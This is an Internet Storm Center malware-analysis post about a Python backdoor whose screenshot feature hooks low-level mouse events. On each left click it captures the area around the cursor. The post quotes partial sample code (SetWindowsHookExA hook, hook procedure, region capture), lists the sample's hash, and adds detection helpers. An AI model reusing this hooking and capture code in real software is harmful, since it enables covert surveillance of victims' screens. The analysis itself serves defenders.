Today, everything is “smart” or “intelligent”. We have smartphones, smart cars, smart doorbells, etc. Being "smart" means performing actions depending on the context, the environment, or user actions.
Backdoors and trojans have implemented screenshot capabilities for a long time. From an attacker’s point of view, it’s interesting to “see” what’s displayed on the victim’s computer. Taking a screenshot in Python is as easy as this:
import pyautogui
screenshot = pyautogui.screenshot('screenshot.png')
You have two approaches to record screenshots:
- On-demand, when the C2 server issues a command like “TAKE_SCREENSHOT”
- At regular intervals (every x seconds)
In the first case, the attacker needs to interact with the malware and can miss interesting “screens”. In the second one, the technique generates a lot of overhead (CPU, storage, bandwidth, …).
Yesterday, I spotted an interesting Python backdoor that implements many classic features (like keylogger, port-scanner, …) but also a “smart” screenshot feature. Why smart? Because a screenshot is taken… when the user clicks on the mouse!
Windows is an event-based operating system. A program can attach to a message bus and listen for specific events (e.g. mouse, keyboard, …). When such an event is detected, a defined function is executed (in ASM, you instruct the CPU to jump to a specific location in memory).
How does it work? The attacker defines a “hook” (or a listener) for mouse events:
def install_hook(self):
    CMPFUNC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(c_void_p))
    self.pointer = CMPFUNC(self.hook_proc)
    self.hooked = self.lUser32.SetWindowsHookExA(WH_MOUSE_LL, self.pointer, kernel32.GetModuleHandleW(None), 0)
    if not self.hooked:
        return False
    return True
The interesting API call is SetWindowsHookExA() combined with the WH_MOUSE_LL hook type[1]. How to interpret this? From now on, every time the mouse is used, Windows will call self.pointer (which wraps self.hook_proc).
Here is the called function:
def hook_proc(self, nCode, wParam, lParam):
    if wParam == 0x201:
        buf, height, width = self.get_screenshot()
        exe, win_title="unknown", "unknown"
        try:
            exe, win_title=get_current_process()
        except Exception:
            pass
        self.screenshots.append((str(datetime.now()), height, width, exe, win_title, buf.encode('base64')))
    return user32.CallNextHookEx(self.hooked, nCode, wParam, lParam)
The screenshot capture is triggered when wParam is 0x201. This value corresponds to a WM_LBUTTONDOWN[2] event (when the user presses the left mouse button). Note that the function calls CallNextHookEx() to pass the event on to the next hook in the chain, so the mouse keeps behaving normally for the victim.
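When reading a hook procedure like this one, it helps to translate the raw wParam values back to their Win32 message names. Here is a minimal sketch of such a lookup. The values come from the Windows headers, but the table is deliberately incomplete, and the names MOUSE_MESSAGES and describe_mouse_message are mine, not the sample's:

```python
# Mouse message IDs as defined in the Windows headers (WinUser.h).
# Only a subset is listed here; this is an analyst helper, not sample code.
MOUSE_MESSAGES = {
    0x0200: "WM_MOUSEMOVE",
    0x0201: "WM_LBUTTONDOWN",
    0x0202: "WM_LBUTTONUP",
    0x0204: "WM_RBUTTONDOWN",
    0x0205: "WM_RBUTTONUP",
    0x020A: "WM_MOUSEWHEEL",
}


def describe_mouse_message(wparam: int) -> str:
    """Return the symbolic name for a mouse message ID, if it is in the table."""
    return MOUSE_MESSAGES.get(wparam, f"unknown (0x{wparam:04X})")


print(describe_mouse_message(0x201))
```

With the sample's check (wParam == 0x201), the lookup confirms that only left-button presses trigger a capture. Mouse moves, button releases and right-clicks are ignored.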
Even better, the attacker does not capture a full screenshot but only the interesting area (where the victim clicked):
def get_screenshot(self):
    pos = queryMousePosition()
    limit_width = GetSystemMetrics(SM_CXVIRTUALSCREEN)
    limit_height = GetSystemMetrics(SM_CYVIRTUALSCREEN)
    limit_left = GetSystemMetrics(SM_XVIRTUALSCREEN)
    limit_top = GetSystemMetrics(SM_YVIRTUALSCREEN)
    height = min(100,limit_height)
    width = min(200,limit_width)
    left = max(pos['x']-100,limit_left)
    top = max(pos['y']-50,limit_top)
    ...
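To make the arithmetic concrete, here is a small sketch that reproduces only the rectangle computation visible above, as a pure function that runs on any platform. The function name capture_region and its parameters are hypothetical, and the screen dimensions in the example are assumed values. The elided part of the sample ("...") is not reproduced:

```python
def capture_region(x, y, virt_left, virt_top, virt_width, virt_height,
                   box_width=200, box_height=100):
    """Compute (left, top, width, height) of the area around a click.

    Mirrors the visible part of get_screenshot(): a 200x100 box centered
    on the cursor, with left/top clamped to the virtual screen origin.
    """
    width = min(box_width, virt_width)
    height = min(box_height, virt_height)
    left = max(x - box_width // 2, virt_left)
    top = max(y - box_height // 2, virt_top)
    return left, top, width, height


# Assumed 1920x1080 virtual screen starting at (0, 0).
print(capture_region(500, 400, 0, 0, 1920, 1080))
print(capture_region(10, 10, 0, 0, 1920, 1080))
```

A click in the middle of the screen gives a box centered on the cursor, while a click near the top-left corner is clamped to the screen origin. Note that the lines shown only clamp the left and top edges. Whether the right and bottom edges are handled in the elided part of the function is not visible here.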
I find this technique clever because the attacker increases the chances of seeing juicy information around the mouse.
The file SHA256 is 34000abaac50ac84d493d2e55b6fb002fe06920b344f02ee55ff77e725793981[3] and has a low VT score (only 6/60).
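Since the hook installation relies on a recognizable API call, a quick static triage of suspicious Python scripts can look for it. The following is only a rough sketch, assuming the script is not obfuscated. The helper name find_hook_indicators is hypothetical, and a match is a hint for further analysis, not proof of malicious behavior (legitimate automation tools use the same API):

```python
import re

# Low-level hook type IDs from the Windows headers (WinUser.h).
HOOK_IDS = {"WH_KEYBOARD_LL": 13, "WH_MOUSE_LL": 14}

# Matches SetWindowsHookEx, SetWindowsHookExA and SetWindowsHookExW.
HOOK_CALL = re.compile(r"\bSetWindowsHookEx[AW]?\b")


def find_hook_indicators(source: str) -> dict:
    """Report hook-related strings found in a script's source text."""
    return {
        "hook_call": bool(HOOK_CALL.search(source)),
        "hook_types": sorted(
            name for name in HOOK_IDS if re.search(rf"\b{name}\b", source)
        ),
    }


line = ("self.hooked = self.lUser32.SetWindowsHookExA(WH_MOUSE_LL, "
        "self.pointer, kernel32.GetModuleHandleW(None), 0)")
print(find_hook_indicators(line))
```

Run against the install_hook() line from the sample, it reports both the API call and the WH_MOUSE_LL hook type.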
[1] https://learn.microsoft.com/en-us/windows/win32/winmsg/about-hooks#wh_mouse_ll
[2] https://github.com/mwinapi/mwinapi/blob/master/ManagedWinapi/Hooks/LowLevelHook.cs
[3] https://bazaar.abuse.ch/sample/34000abaac50ac84d493d2e55b6fb002fe06920b344f02ee55ff77e725793981/
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.